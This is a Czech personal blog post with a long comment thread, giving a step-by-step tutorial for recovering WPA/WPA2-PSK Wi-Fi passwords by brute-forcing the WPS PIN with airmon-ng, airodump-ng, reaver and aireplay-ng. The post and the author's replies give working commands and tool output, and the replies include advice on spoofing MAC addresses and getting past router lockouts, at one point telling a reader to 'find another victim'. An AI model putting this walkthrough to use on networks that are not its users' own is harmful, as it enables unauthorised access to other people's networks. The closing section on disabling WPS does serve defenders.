mrpear.net logo osobní web jednoho ajťáka
► ČESKY | ENGLISH |
twitter icon flickr icon 500px icon

Prolomení WPA/WPA2-PSK přes WPS snadno a rychle (praxe)

Zhruba před čtvrt rokem jsem tady na blogu nakousl problematiku prolomení WPA-PSK přes WPS a na závěr jsem slíbil praktickou demonstraci provedení útoku. Je na čase splnit slib a proto právě nyní píši tento příspěvek, ve kterém popíši použití několika běžně dostupných nástrojů k prolomení WPS a tím získání hesla k wifi síti zabezpečené pomocí WPA(2)-PSK. Myslím si, že pro spoustu z vás to bude mnohem příjemnější čtení, než teoretické plkání v článku předchozím ;).
UPDATE: Uzavřel jsem komentáře, protože názory začaly přerůstat spíše v diskuzní fórum s nádechem nejde se mi nabourat sousedovi na wifi, co s tím? Samozřejmě těm, kteří do diskuze přispěli s čistějšími úmysly tímto děkuji a případně se omlouvám za to, že již není možné na jejich příspěvky reagovat. Zároveň pro všechny s ne moc čistými úmysly musím bohužel pro vás konstatovat, že velmi úspěšně roste zabezpečení proti tomuto útoku a to díky přílivu nových routerů do domácností. Tyto routery používají tu nejjednodušší ochranu proti útoku hrubou silou a to že zamknou WPS po několika neúspěšných pokusech (dokonce na dobu rostoucí exponenciálně) a útok je tak v podstatě nereálný.
Na úvod samozřejmě musím začít tím, že provádět takovéto útoky na cizí sítě za účelem získat k nim přístup je silně neslušné a možná i něco víc. Proto zdůrazňuji, že následující postup píši hlavně pro ty, kteří si chtějí ověřit zabezpečení vlastní sítě a nebo chtějí upozornit na slabě zabezpečenou síť svého souseda. Zároveň je tento postup vhodný pro ty, kteří si chtějí ověřit teoretické znalosti získané v mém předchozím příspěvku.
Reklama

Předpoklady

K provedení úspěšného útoku budeme potřebovat následující věci: Mít, resp. útočit na router s aktivím WPS je opravdu nutnost, protože útočíme na slabinu WPS, nikoliv WPA-PSK či WPA2-PSK.

UPDATE: BackTrack už není aktuální

...a nelze ho oficiální cestou stáhnout. Postup popsaný níže ale stále platí!
Nejlepší je přejít na Kali Linux, nabízí stejné nebo lepší nástroje. Kdo chce BackTrack 5, může využít torrent, kde tato distribuce bude určitě ještě dlouhou dobu ke stažení k dispozici.

Co získáme?

Pokud bude náš útok úspěšný, získáme přes slabinu WPS heslo k wifi síti, tedy část PSK z WPA(2)-PSK. Útok a jeho časová náročnost nemá vůbec žádnou souvislost s kvalitou použitého klíče (hesla), protože znovu opakuji, útočíme na WPS, nikoliv na WPA. Nadále platí, že WPA jako takové nelze prolomit jinak než hrubou silou a je tak teoreticky samo o sobě neprolomitelné v případě, že je heslo dostatečně silné.

Představení BackTrack Linux

BackTrack Linux bude náš hackovací nástroj (nikoliv háčkovací). Jedná se o speciální linuxová distribuci zaměřující se na bezpečnost s využitím hackingu. BackTrack Linux nabízí kompilaci nástrojů, pomocí kterých lze provádět útoky (hacking) a tím ověřovat úroveň zabezpečení testovaných obětí. Ačkoliv v distribuci použité nástroje pro hacking můžete získat i do kterékoliv jiné běžné linuxové distribuce (a možná i do Windows), v BackTrack Linux máte vše sladěno a připraveno pro snadné použití — o čemž se koneckonců sami za chvíli přesvědčíte.

Stažení a příprava

Aktuální verzi si můžete stáhnout vždy na stránce BackTrack Linux — downloads, v době psaní článku je aktuální verzí BackTrack 5 R3. Pokud distribuci ještě nemáte, začněte stahovat, přeci jen stáhnou 3GB dat není na chvilku. Velmi vhodné vzhledem k rychlosti je stahovat distribuci přes torrent (pozn.: alespoň po dlouhé době využijete torrent klienta pro něco, k čemu byl doopravdy stvořen ;)).
Ke stažení je na výběr několik kombinací hotových systémů — 32 a 64 bitové systémy a prostředí plochy (desktop environment) GNOME nebo KDE. Pokud nevíte o co jde, zvolte třeba GNOME a 32 bitovou variantu. GNOME preferuji já a veškeré ukázky tady budou právě z tohoto prostředí. 32 bitová varianta systému poběží na každém (i starším) stroji, zatímco 64 bitová verze má předpoklady být výkonnější než 32 bitová, ale poběží pouze na podporovaném hardware (architektuře) — nějakou dobu už jsou v podstatě všechny notebooky a PC na Intel platformě 64 bitové (x64).
K dispozici je ISO obraz a také obraz pro virtualizované prostředí (VMWare). Já preferuji ISO obraz, který fyzicky vypálím na DVD a z něj pak nabootuji hotový systém na nějakém notebooku, který mám zrovna k dispozici. BackTrack ve virtualizovaném prostředí jsem ještě nezkoušel, přeci jen se trošku bojím problémů s detekcí hardware.
BackTrack Linux se neinstaluje, je to live distribuce, která se spouští přímo z DVD a může se rovnou používat. Tedy přesněji řečeno, je to jeden z možných způsobů použití. Díky tomu lze distribuci spustit na téměř libovolném stroji bez dlouhých příprav.

Startujeme BackTrack Linux

Takže máme staženo a vypáleno, DVD vloženo v notebooku a startujeme.
Pokud je v mechanice vloženo DVD a notebook přesto startuje klasicky do běžného systému, tak zřejmě nemá nastaveno bootování z optické mechaniky. Většinou lze pořadí bootování jednorázově určit stiskem klávesy F12 při nabíhání BIOSu, popř. je nutné pořadí bootování změnit právě v nastavení BIOSu. Konkrétní nastavení se odvíjí od modelu notebooku.
Potvrzením (stiskem ENTER) prvních dvou boot-dotazů systém naběhne do textového režimu (příkazový řádek), ve kterém můžeme začít pracovat. Je ale vhodné vstoupit do grafického režimu a pracovat v okýnkách. Prostředí pracovní plochy spustíme zadáním příkazu:
startx
Po načtení pracovní plochy se ocitneme v příjemném prostředí, které nebude dělat problémy ani čistě Windows uživatelům.
BackTrack Linux 5 R3 - GNOME desktop
BackTrack Linux 5 R3 - GNOME desktop
I v prostředí GNOME ale budeme pracovat pouze s příkazovým řádkem. Výhodou oproti klasickému příkazovému řádku může být to, že si těchto oken můžeme otevřít hned několik. K otevření okna příkazového řádku použijeme horní lištu, kde je vedle nabídky System připraven zástupce pro jeho spuštění.
BackTrack Linux 5 R3 - příkazový řádek
BackTrack Linux 5 R3 - příkazový řádek

Hackujeme

Nyní nás čeká provedení samotného útoku. Pomocí pár utilit vytvoříme z wifi karty a našeho počítače penetrační nástroj.

Přepnutí wifi karty do monitorovacího režimu

Prvním krokem je přepnutí bezdrátové karty do monitorovacího režimu. K tomu použijeme utilitu airmon-ng a to v následující syntaxi:
airmon-ng start wlan0
BackTrack Linux 5 R3 - airmon-ng
BackTrack Linux 5 R3 - airmon-ng
Parametr wlan0 je označení fyzické wifi karty. Linux čísluje tyto karty od nuly, jedná se tedy o první kartu. Pokud je v systému více karet (například interní + přes USB), je možné parametr upravit na požadovanou hodnotu. Po provedení příkazu se vytvoří nový virtuální adaptér s označením mon0, se kterým budeme později pracovat.
Pozn.: Pokud chcete zobrazit seznam všech síťových karet v systému (včetně virtuálních), použijte příkaz ifconfig.

Získání informací o routeru

K samotnému útoku potřebujeme znát MAC adresu testovaného routeru, tedy fyzickou adresu tohoto zařízení. Pokud teď testujeme vlastní router, máme více možností, jak adresu zjistit. Nejjednodušší cesta je přes webové rozhraní routeru, popř. může být tato adresa vytištěna na některém z jeho štítků. Nezapomeňme ale, že většina routerů umožňuje MAC adresu změnit (většinou se klonuje z PC).
My si ale zahrajeme na opravdového hackera a potřebnou informaci si zjistíme pomocí utility airodump-ng. Skutečný hacker totiž většinou k routeru, na který útočí, nemá přístup.
airodump-ng mon0
Utilita akceptuje více parametrů, pro základní sken okolí ale stačí pouze předat označení adaptéru, který chceme použít. Všimněte si, že jsme použili již virtuální adaptér mon0.
airodump-ng
airodump-ng
Necháme airodump běžet nějakou chvíli, dokud se v seznamu neobjeví požadovaný router. Z výpisu je patrný SSID každé sítě (její název) a také MAC adresa zařízení. Jakmile vidíme požadovaný záznam, stiskneme Ctrl+C a vrátíme se tak zpět do příkazového řádku.

Zahájení brute-force útoku

V tuto chvíli máme všechny potřebné informace pro spuštění útoku. Na řadu přichází poslední utilita reaver, která provede samotný útok hrubou silou.
Za předpokladu, že MAC adresa našeho routeru je 11:22:33:44:55:66 a pro útok použijeme virtuální mon0 adaptér, pustíme reaver s následujícími parametry:
reaver -i mon0 -b 11:22:33:44:55:66 -vv
První dva parametry jsou zřejmé, poslední z nich -vv instruuje reaver, aby byl velmi výřečný (very verbose), což má za následek poskytnutí detailního výpisu na obrazovku během útoku.
Reaver - právě spuštěno
Reaver - právě spuštěno

Co když se útok nerozjede?

Pokud se po spuštění útoku začne objevovat následující hláška:
[!] WARNING: Failed to associate with 11:22:33:44:55:66 (ESSID: nazev)
Můžeme zkusit spustit v druhém okně příkazového řádku (terminálu) aireplay, který začne generovat provoz ve wifi síti a tím pomůže odstranit problém s asociací.
spustíme aireplay (první terminál)
#aireplay-ng mon0 -1 120 -a 11:22:33:44:55:66 -e název routeru (wifi sítě)

spustíme reaver (druhý terminál)
#reaver -i mon0 -A -b 11:22:33:44:55:66 -vv
Nepřehlédněte, že reaver dostal navíc parametr -A.
Pokud se útok zastaví ihned po úspěšné asociaci s routerem, tedy zůstane stát na této hlášce:
[+] Associated with 11:22:33:44:55:66 (ESSID: nazev)
není s největší pravděpodobností na routeru aktivní WPS (alespoň tak se u mě reaver v tomto případě choval). Můžeme ještě zkusit otestovat stav WPS pomocí utility wash:
wash -i mon0 -C
U aktivního WPS by měl wash vypsat verzi WPS (1.0) a hodnota WPS Locked musí být No.
Určitě mi dejte v komentářích vědět, zda něco z toho pomohlo.

Jak to funguje?

Finta celého útoku je v tom, že router potvrdí správnost první poloviny osmimístného PINu bez ohledu na to, zda souhlasí zbytek. Reaver tak v první fázi postupně zkouší všechny možnosti v rozsahu 0000yyyy až 9999yyyy. Pokud je potřeba na jeden PIN zhruba 3 až 5 sekund, je zřejmé, že u PINu začínajícího devítkou bude útok hrubou silou trvat mnohem déle (až 12 hodin), než u PINu začínajícího například jedničkou (hodina až dvě). Jistotou ovšem je, že pokud router nemá implementovány žádné obranné mechanizmy, bude útok vždy úspěšný a to v řádu maximálně desítek hodin.
Druhá část útoku je již mnohem rychlejší, protože druhá části PINu má sice také čtyři číslice, ale poslední z nich je kontrolní součet, který lze odvodit z předcházejících sedmi číslic. Je tedy nutné vyzkoušet pouze hodnoty v rozsahu xxxx000z až xxxx999z, kde xxxx již známe z předcházející první části a hodnotu kontrolního součtu z dopočítáme.
Reaver - úspěšný útok
Reaver - úspěšný útok
Útok na tento konkrétní PIN netrval déle než dvě hodiny. Pro zajímavost ještě snímek nastavení WPS na testovaném routeru:
Router QSS/WPS nastavení
Router QSS/WPS nastavení
Po úspěšném útoku máme k dispozici dva velmi důležité údaje. Samotné heslo k WPA(2)-PSK a také PIN k WPS! Pomocí PINu můžeme opakovaně útočit a získávat okamžitě heslo k WPA. Pokud tedy majitel routeru změní pouze heslo a PIN zůstane původní, je to pro útočníka jen minimální překážka.
Reaver - hack s použitím PINu
Reaver - hack s použitím PINu
Jak je vidět, opakovaný útok netrval déle než 4 sekundy.

Co se může během útoku pokazit

Útok se nemusí povést vždy. Hlavním důvodem může být to, že router nemá aktivní WPS nebo WPS vůbec nepodporuje. Pak samozřejmě útočit na WPS nelze. Router může také implementovat jeden či více obranných mechanizmů, které mohou útok značně časově prodloužit či dokonce v reálné praxi znemožnit. Z těchto poznatků také plyne jediná účinná obrana proti tomuto druhu útoku — vypnout WPS nebo mít router implementující obranné mechanizmy proti brute-force útoku.

Související příspěvky

Reklama

Komentáře

30. 1. 2013 17:26:35, podzim
[+] Switching mon0 to channel 1
[!] WARNING: Failed to associate with 00:4F:62:1C:FF:02 (ESSID: wifi)
[!] WARNING: Failed to associate with 00:4F:62:1C:FF:02 (ESSID: wifi)
[+] Switching mon0 to channel 8

Hmm v čem může být chyba?
Mám to nechat spuštěné déle ?
30. 1. 2013 18:55:30, mrpear
Zkuste spustit v jiném okně aireplay dle následujícího příkladu, což by mohlo pomoci s asociací. U reaveru přibyl parametr -A. Dejte vědět, zda to pomohlo, doplním když tak článek. Díky.

start aireplay
#aireplay-ng mon0 -1 120 -a <MAC AP> -e <AP name>

start reaver
#reaver -i mon0 -A -b <MAC of AP> -vv
30. 1. 2013 21:16:15, podzim
[+] Waiting for beacon from 00:4F:62:1C:FF:02
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 1
[+] Associated with 00:4F:62:1C:FF:02 (ESSID: wifi)

Dále už nic
30. 1. 2013 21:24:32, mrpear
Takže asociace už ok. To co píšete dál - má router aktivní WPS? A pokud ano,máte silný signál (není router daleko)?

Protože přesně takhle se mi choval reaver při útoku na router bez WPS.
30. 1. 2013 21:30:28, podzim
Signál je kolem -76 db (2 čárky),jesli má wps nevím :)
30. 1. 2013 21:35:36, Tomáš
Pěkné :-) Více článků s touto tematikou.
30. 1. 2013 21:40:16, mrpear
No tak ale WPS je nutnost...

Zkuste: wash -i mon0 -C

Vypíše to aktivní WPS (verze WPS 1.0 a Locked: no)?
30. 1. 2013 21:52:15, podzim
Bohužel nic
30. 1. 2013 21:55:34, mrpear
V tom případě útočit není na co... Zbývá útok přímo na WPA, možná o tom taky něco napíšu...
31. 1. 2013 15:34:19, bublik
Router má aktivní WPS, ale při pokusu o asociaci router odmítne MAC adresu mé wifi karty. Čím by to mohlo být? A je nějaké řešení získat heslo, pokud znám PIN toho routeru? Děkuji.
31. 1. 2013 15:53:07, mrpear
[bublik] Jak přesně odmítne (co hlásí reaver?). Napadá mě pohrát si trošku s MAC adresou (dá se samozřejmě změnit přes parametr u jednotlivých utilit) - asi by bylo třeba zjistit MAC adresu stroje, který běžné s routerem komunikuje (lze přes airodum-ng). Router totiž může mít filtr na MAC adresy a pustí na sebe pouze povolené. Pokud znáte PIN, lze heslo zjistit využitím parametru --pin u reaveru. Nicméně samozřejmě musíte se dostat přes problém s odmítnutou MAC adresou ;).
31. 1. 2013 20:48:46, bublik
Hlásí: AP rejects the source MAC address (MAC mého routeru) ?
Authentication failed (code 1)
A jak přesně zadat u reaveru syntaxi s pinem? Případně, jak nastavit wifi kartě klonovanou MAC(některou z povolených MAC adres znám)? Jsem v linuxu naprostý začátečník, děkuji.
2. 2. 2013 19:22:51, bublik
Přes airmon-ng se mi povedla asociace s AP pomocí příkazu:
ifconfig wlan0 hw ether AA:BB:CC:DD:EE:FF
V reaveru končím po asociaci v bodě:
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occured
Kde dělám chybu? Děkuji.
3. 2. 2013 9:10:10, mrpear
[bublik] Zkusit asociaci přes aireplay-ng v druhém okně terminálu (popsáno v článku) a ještě jsem na netu našel možnost zkusit přidat k reaveru následující parametry: -N -n -w -S. Dejte vědět, jestli něco z toho pomohlo.
9. 2. 2013 10:32:47, podzim
Takže jsem to zkusil na jine wifi,asociace proběhla v pohodě ale:

[+] Waiting for beacon from 38:72:C0:DC:63:42
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 6
[+] Associated with 38:72:C0:DC:63:42 (ESSID: MS124)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
10. 2. 2013 20:05:34, David
to samé viz. podzim
10. 2. 2013 20:31:22, mrpear
[podzim, David] Tahle zpráva hlásí, že se router s největší pravděpodobností braní útoku. Zkusit parametr --ignore-locks. Každopádně router se může zamknout po X neúspěšných pokusech a nějakou dobu blokovat WPS. Takže hledat další oběť ;).
11. 2. 2013 7:57:08, mrpear
[podzim, David] Ještě upřesnění - dohledal jsem, že takhle se může reaver chovat, pokud router hlásí vypnuté WPS i přes to, že jej vypnuté ve skutečnosti nemá. K tomu pomáhá právě zmiňovaný parametr --ignore-locks.
11. 2. 2013 17:51:19, David
Super, rozjelo se to.
Moc dík.
11. 2. 2013 18:25:36, David
Sakra, stále se to opakuje:
[+] Trying pin 12345670
[+] sending EAPOL START request
[+] Recieved identity request
[+] Sending identity response
[!] WARNING: Recieve timeout occured
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] sending EAPOL START request
[+] Recieved identity request
[+] Sending identity response
[!] WARNING: Recieve timeout occured
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin

a stále dokola
11. 2. 2013 18:35:23, mrpear
[David] A co se tak smířit s tím, že ta wifina má WPS bloknuté....???
11. 2. 2013 20:34:12, David
Dobrá rada, díky:))
18. 2. 2013 11:04:08, Dennis
Zdravím,
mám stejný problém jako podzim a David, ale mám dotaz. Ochranné mechanismy u WPS, mě pustí jen 2 piny za 60 sekund. A pouští to všechny připojené pc 2 piny/60 sekund, nebo každý pc 2 piny/60 sekund? Pokud by to odpovídalo variantě 2, nešlo by nějakým způsobem při každé zkoušce pinu změnit adresu pc tak, aby to jelo nepřetržitě? Samozřejmě pomaleji než u vypnutých mechanismů, ale rychleji než 2 piny/60 sekund. Popřípadně nešlo by propojit více pc s backtrackem, ale tak aby se synchronizovali a každý zkoušel jiné piny?

Děkuji za odpověď.
18. 2. 2013 11:28:44, mrpear
[Dennis] Jaká přesně je ochrana, to záleží na implementaci v routeru. K tomu, aby mohla fungovat varianta 2, musel by si router držet někde v paměti adresy klientů a počet neúspěšných pokusů, což se mi moc nezdá. Takže podle mě spíš varianta první. Pokus se změnou MAC adresy by šel určitě minimálně vyzkoušet ručně.
18. 2. 2013 13:17:11, Dennis
Bohužel výměna MAC to nijak neovlivnila. Ještě po několika pokusech router zablokoval přístup pomocí WPS...(je dobře vybaven). Alespoň se nemusím bát nežádoucího napadení. Mimochodem díky za nápad změnit MAC ručně, ikdyž to nepomohlo.
18. 2. 2013 13:20:33, mrpear
[Dennis] Tak je vidět, že někteří výrobci berou slabinu WPS vážně a snaží se útokům bránit. Jen pro zajímavost, jaký máte router?
18. 2. 2013 16:41:47, Dennis
No asi opravdu berou, na jednu stranu je to dobře. A dokonce i nějaká výzva, když se majitel nudí.

Router: Linksys E3000-CE (také je to pěkně drahá hračka)
14. 3. 2013 11:10:34, majo
Tak ja som to skusal na zariadeniach jedneho operatora mimo sk a pekne to asiciovalo potom sa to rozbehlo a po minute sa to locklo a vyplo sa wps ale rano uz naspat wps bolo aktivne tak pravdepodobne to ma ochranu nejaku .
14. 3. 2013 20:36:45, Jaroslav
Dobrý den
Všechno funguje podle popisu. Počítadlo pin napočítá do 12349982 a 99.99% a dál cyklí na tomto pinu. Signál je kolem -60. 2x se stejným výsledkem. Co s tím?
18. 3. 2013 20:21:09, BT
Ukazuje to tohle -
[!] WPS transaction failed (code: 0x02), re-trying last pin
Přesto že wash mi ukazuje WPS 1.0 a locked : NO ... tak nevim že by MAC filtr? A pokud jo tak dalo by se to obejít macchangerem na MAC adresu počítače který se na tu wifi připojuje? Děkuji
27. 3. 2013 23:51:39, spoowe
moc pěkný článek a doporučuji aby ste si stalhy program : lili usb creator. a hodili backtrack na flešku min.4gb
1) je to s tím cele svižnějsí a rychlejš se načíta
2) umožní používat i např.v pc bez dvd mechaniky a nebo rovnou ve windows
pro méně zručne dám i navod jak zprovoznit
1)samosebou nejdřív připojit flešku z které chceme načítat backtrack do pc
step 1 zde vybereme flešku ze seznamu disku z které chceme vytvořit bootovací flash
step 2 zde máme 3 možnosti 1.je že vložíme již stažený backtrack nebo jiný linux. 2. je že načteme z již vypáleného dvd (což nedoporučuji je příliš zdlouhave) 3. je že si backtrack nebo jiný linux (jsou tam snad všechny co kdy byly ale neskoušel sem stahnout všechny) stáhneme přímo.
step 3 necháme tak jak je
step 4 zde máme 3 kolonky první necháme nezaškrtlou protože pak se nemusí vubec zdařit vytvoření. druhou osobně nechávám zaškrtnutou protože se smažou všechna data ne flešce a tím se připraví na nahrání backtracku nebo jineho os. (pokud tam nějaké data máte tak si je přesunte do počítače jetli je chcete)
a třetí je čistě na vát když ji zaskrtnete tak se vám k tomu přidá program ve kterem lze spouštět backtrack we windows návod na spuštění vám řeknu až bude vše hotovo
a nakonec step 5 zde klikneme na obrázek blesku a zacne se v podstatě vypalovat backtrack na flešku.
po dokončení bud spustíte přímo we winsows a nebo podle podle autora tohoto článku z biosu akorád s tou změnou že místo dvd mechaniky vybereme flash disk.
a ted k tomu spouštění ve windows : rozklikneme tento počítač pote flešku a zam máte několit složek ale nás nejvíce zajíma složka s názvem Virtualbox tu otevřeme a spustíme aplikaci Virtualize_This_Key a pak čekáme než se načte viz článek.
dékuji za pozornost snad sem tím někoho potěšil :) SpooweBeatz.
link zde: http://www.stahuj.centrum.cz/utility_a_ostatni/ostatni/lili-usb-creator/
a eště mám dotaz prolomení se mi podařilo ale s heslem a ani s pinem se již 3 dny nemužu na wifi připoojit nevíte někdo proč?
7. 4. 2013 22:35:57, Zaibatsu
vim hovno co tu píšete ale du na to, připadám si, jak slepec na motorce, držte si klobouky
24. 4. 2013 11:50:20, HackingNoob
[-] Failed to retrieve a MAC address for interface '-mono0' !
Mě se vždy zobrazí tato chybová hláška ihned po spuštění příkazu pro brute force...
26. 4. 2013 10:28:39, Sal
zdravim ...
naskytl se mi podobny problem a jen se chci ujistit ohledne WPS blokace
po 4 hodinach (30%)se testovani stale opakovalo naposledy testovany PIN
[+] Trying pin 32284586
[+] sending EAPOL START request
[+] Recieved identity request
[+] Sending identity response
[!] WARNING: Recieve timeout occured
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 32284586
[+] sending EAPOL START request
[+] Recieved identity request
[+] Sending identity response
[!] WARNING: Recieve timeout occured
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin

testuju vlastni cisco takze budu jedine rad kdyz nepujde prolomit :)
26. 4. 2013 10:33:02, mrpear
[Sal] Blokace po 4 hodinách mi přijde divná (dost pozdě). Zkusit spustit útok ještě s parametrem --no-nacks a zjistit, zda se to bude chovat stejně.
26. 4. 2013 21:51:57, sal
restartoval jsem to jeste jednou.. bez prikazu nacks. pro zmenu pri 67% se problem opakoval. restartoval jsem router a test pokracoval a skoncil uspesne... teda.. zjistil heslo k routeru ..
vypnout wps nejde.. takze jedinna ochrana asi pred podobnymi utoky je filtrace mac adress

pres noc to pustim s no-nacks..treba to dojede do konce.
zatim diky za rychle reakce ;)
28. 4. 2013 8:32:14, mrpear
[Sal] No jo, routery u kterých nelze vypnout WPS, jsou z dnešního pohledu bezpečnostní díry jak hrom, ale tak možná jejich autoři nepředpokládali, že se něco takového provalí...
29. 4. 2013 19:11:31, Xerox
Mám stejný problém jako popisuje někdo nademnou:
[-] Failed to retrieve a MAC address for interface '-mono0' !
Nevíte co s tím prosím?
30. 4. 2013 18:36:52, mrpear
[Xerox] Problém se získáním mac adresy adaptéru. Zkusil bych ji zadat ručně pomocí --mac=00:BA:AD:BE:EF:69.
1. 5. 2013 8:49:47, Sal
takze co se tyce ty bezpecnosti... prestala byt nabizena moznost ke zjisteni pin kdyz jsem zapinal jednotlive ochrany v routeru... konkretne "filter nat"

takze mam jen povolene macadresy... ale co jsem zase jinde cetl .. ze hackerovi staci zjistit macadresu zarizeni ktery je v povolenych ..a vyklonuje si ji.. takze koukam ze je to pekna sranda :)

rikam zatim funguje filtrovani nat...
2. 5. 2013 9:50:53, Petr
Zkoušel jsem postup na VDSL routeru a vše fungovalo jak má zhruba čtvrt hodiny. Pak to spadlo na chybu, že zařízení neodpovídá.... Kouknul jsem na router zjistil, že je po něm. Po zapnutí se restartoval asi v minutových intervalech. Nešlo se na něj dostat ani po LAN. DHCP neběželo, ping nešel.... Vyreklamoval jsem ho, dostal nový. Myslíte, že to byla jen blbá náhoda a odešel by v tu dobu stejně, nebo to byl důsledek WPS útoku? Na novém routeru jsem to pro jistotu znovu nezkoušel :)
3. 5. 2013 23:21:58, laco554
dobry den mam problem ukazuje mi
to iste co tomu hore

[+] Switching mon0 to channel 1
[!] WARNING: Failed to associate with 00:4F:62:1C:FF:02 (ESSID: wifi)
[!] WARNING: Failed to associate with 00:4F:62:1C:FF:02 (ESSID: wifi)
prikaz aireplay mi nefuguje co mam robyt?
10. 5. 2013 4:28:43, Krysa
Ahoj všem mam problem hned na zacatku, stahl jsem si BackTrack 5 R3 32bit jako iso. Pote jsem ho vlozil do vyrtualni mechaniky z ktere jsem to vypalil na dvd. Dvd obasuhje ty to slozky a soubory: .disk , casper, isolinux, preseed, md5sum, README ubuntu. DVD mi nechce nabotovat na zadnem pc ze tri jinak kdyz tam dam jakekoliv winy tak bez problemu botujou. OS mam XP prosim moc o radu necekal jsem ze uviznu na tak blbem mrtvem bode.Jinak ostatni aplikace mam tez stazene : airmon-ng, airodump-ng, reaver snad mi tu nejak poradite co stim. :) predem dik.
10. 5. 2013 7:18:42, sal
tim ze jsi iso vypaloval pouze kopirovanim slozek z namountovane virtualmechaniky ..jsi prisel o Bootovaci cast dvd.

musis vypalit primo iso.. nikam ho nepripojuj do virtualek...

postup je podobny pro vsechny vypalovaci programy ..jako Nero br.

spust nero .. v hornim levem rohu .. "soubor>otevrit>a najdi si to iso...
tot vse
11. 5. 2013 11:01:10, Krysa
Tak ze jestli to chapu tak to botuje iso ktre se jmenuje
Image Name: BT5R3-KDE-32.iso
Size (MB): 3100
Desktop: KDE
Architecture: 32
Image: ISO
Download: Direct
MD5sum: d324687fb891e695089745d461268576

nebo mam stahnout ten

Image Name: BT5R3-GNOME-VM-32.7z
Size (MB): 2600
Desktop: GNOME
Architecture: 32
Image: VMWare
Download: Direct
MD5sum: bca6d3862c661b615a374d7ef61252c5


Jinak dekuju za radu opravdu me nenapadlo ze se jde nabootovat iso ktere ma priponu priklad GR5.iso tak to jdu stahnout znova.
12. 5. 2013 13:40:55, Sal
pokud mas flashku 4gB je to jeste rychlejsi .. jak zapis, tak spousteni BT

stahni toto ..http://unetbootin.sourceforge.net/ a v nastaveni si zvol.. BT.. myslim ze je tam jen starsi verze ale me fungovala s novejsim BT
12. 5. 2013 13:45:14, Sal
samozrejme stahnout *.ISO :)
doufam ze prijdes snadno na to nastaveni v unetbootinu.
nechtel bych te ted spatne navadet..a zaroven ted rozepisovat postup ale neni tam nic ke zkažení :)
14. 5. 2013 7:39:46, mrpear
Tak vidím, že si tady pomůžete i beze mě ;)
19. 5. 2013 10:18:28, Jarda
Dobrý den.Jsem v Linuxu naprostý amatér.Nicméně zkouším dle návodu a "zasekl" jsem se hned na prvním příkazu.
Toto mi to vypíše.Můžete mi poradit co mám dělat prosím?
Found 1 processes that could trouble.
If airodump=ng, aireplay-ng or airtun-ng stops working after a short period
of time, you may to kill (some of) them!

PID Name
1252 dhclient3
Interface Chipset Driver

Za odpověď dík
28. 5. 2013 21:30:04, Vitto
Mimochodem, taky mám otázku, doběhl mi reaver na 99.99% zasekl se a začal opakovat pin (v dalším terminalu jsem měl spusteny aireplay pokud to s tim souvisi) interface používám virtuální síťovku se zmenenou MAC. Vzal jsem tedy 4 čísla z pinu a doufám, že jsou správná. "reaver -i airoscript0 -v -b (bssid) -c 10 -e xxxx -p 5606 -d 1" ale pokud nebudou a problém bude pretrvavat, tak nejaky napad na reseni? Predem dekuji.
28. 5. 2013 21:43:58, Vitto
Ahoj Jardo, tímto se se podle me zabývat nemusíš - airodump použiješ jenom při zjišťování bssid AP (acces point- no proste router:D), aireplay pouze v případě problému s asociací a airtun používat nebudeš, takže toto hlášení můžeš ignorovat. Btw. Pokud znate wps pin routeru, do reaveru pridejte -p "********" (bez uvozovek, carky nahradte cisly). (jsem na mobilu, tak se omlouvam za chybejici interpunkci)
30. 5. 2013 7:41:00, Vitto
Zdravím znovu, diskuse už je pravděpodobně dead, ale nevadí.

laco554 - Zkusil jsi nejdříve příkaz wash -i mon0 ? Router nemusí mít zaplé wps.

Xerox - Interface je wlan0, mon0 (poté mon1, mon2,... vždy když spustíte airmon, mon přeskočí na další číslo) Pokud změníte MAC, třeba z důvodu odhalení, nebo tak, interface je potom airoscript0. Interface "monoo" neexistuje.

Jaroslav - Pokud vám to v obou brute útokách ukázalo pin - 1234
Tak budeme předpokládat, že je správný, s tímto problémem jsem se taky potýkal, ale vyřešil jsem ho jednoduše downgradem reaveru z 1.4 na 1.3, ten už běží jako hodinky. Nemusíte čekat od znova, pokud byla 1část pinu správná (1234) tak ji akorát zadáte do parametru reaveru (-p 1234). Ale nejdříve se zbavíme 1.4ky.

Já jsem teda osobně smazal soubory ručně. Příkaz mi nešel. Reaver je ukryt v /usr/local/bin/reaver, smažte ručně a podíváme se na instalaci.

1. stáhneme reaver 1.3

Zadáním příkazu "wget http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz" se vám stáhne tar s reaverem 1.3

2. Extrahujeme

K tomu poslouží tento příkaz "tar zxvf reaver-1.3.tar.gz"

3. Až doběhne proces, zadejte "cd reaver-1.3/src"
Začátek přík. řádku by měl zmodrat.

4. "./configure" Konfiguruje reaver, kdo by to řek.

5. "make"

6. A konečně příkaz "make install"

Když by to vyhodilo na konci chybu, je nutné smazat ještě nějaké zbytky po 1,4ce, ale ve finále to funguje.

Můžeme tedy vyzkoušet 1.3.

reaver -i mon0 -A (pokud máte aireplay) -b (bssid - MAC routeru) -vv (já používám teda jenom jedno, píše to jenom procenta a rychlost) -p 1234 (tímto reaveru zadáte, aby zkoušel jenom 2 polovinu pinu.

Optionálně můžete přidat -e ssid (jméno wifi) -c (kanál, na kterém wifi běží) -d (delay v sekundách v základu je "1", mám dojem)

Dejte vědět, pokud pomohlo. Já jsem se prokousal bránícím se routerem za 3 dny, je taky možné, že router při zjištění pinu začne chrlit nesmyslné kody


- [+] WPS PIN: '56061048'
[+] WPA PSK: '2febcdd02e889188a2fcd0accd352901d1b527ef4...
30. 5. 2013 7:43:57, Vitto
...,f714cbbb071bba0733c9f3f'
[+] AP SSID: 'Hackmepls'

